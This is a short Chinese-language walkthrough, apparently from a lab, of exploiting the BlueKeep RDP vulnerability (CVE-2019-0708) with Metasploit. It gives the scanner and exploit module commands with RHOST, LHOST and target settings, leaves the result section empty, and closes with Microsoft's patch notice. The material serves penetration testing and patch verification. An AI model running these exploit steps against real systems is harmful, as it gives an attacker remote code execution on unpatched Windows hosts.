1. 工具
Msfconsole
2. 利用过程
2.1 启动msf
root@kali:~# msfconsole
2.2 搜索0708
msf5 > search 0708
2.3 测试主机是否存在0708漏洞
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 192.168.56.101
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > exploit
2.4 利用
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
2.5 设置payload
set RHOST 192.168.56.101
set LHOST192.168.56.102
set target 1
2.6 执行渗透(有成功概率)
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
2.7 结果
3. 修复
Microsoft 意识到有些客户正在运行不再获得主流支持的 Windows 版本。 这意味着这些客户将不会收到任何安全更新来保护他们的系统免遭 CVE-2019-0708(这是一个严重的远程执行代码漏洞)的攻击。
鉴于对客户及其业务的潜在影响,我们决定为不再获得主流支持的平台提供安全更新(请参阅下表中的下载链接)。 这些更新仅通过 Microsoft 更新目录提供。 我们建议运行以下操作系统之一的客户尽快下载并安装此更新。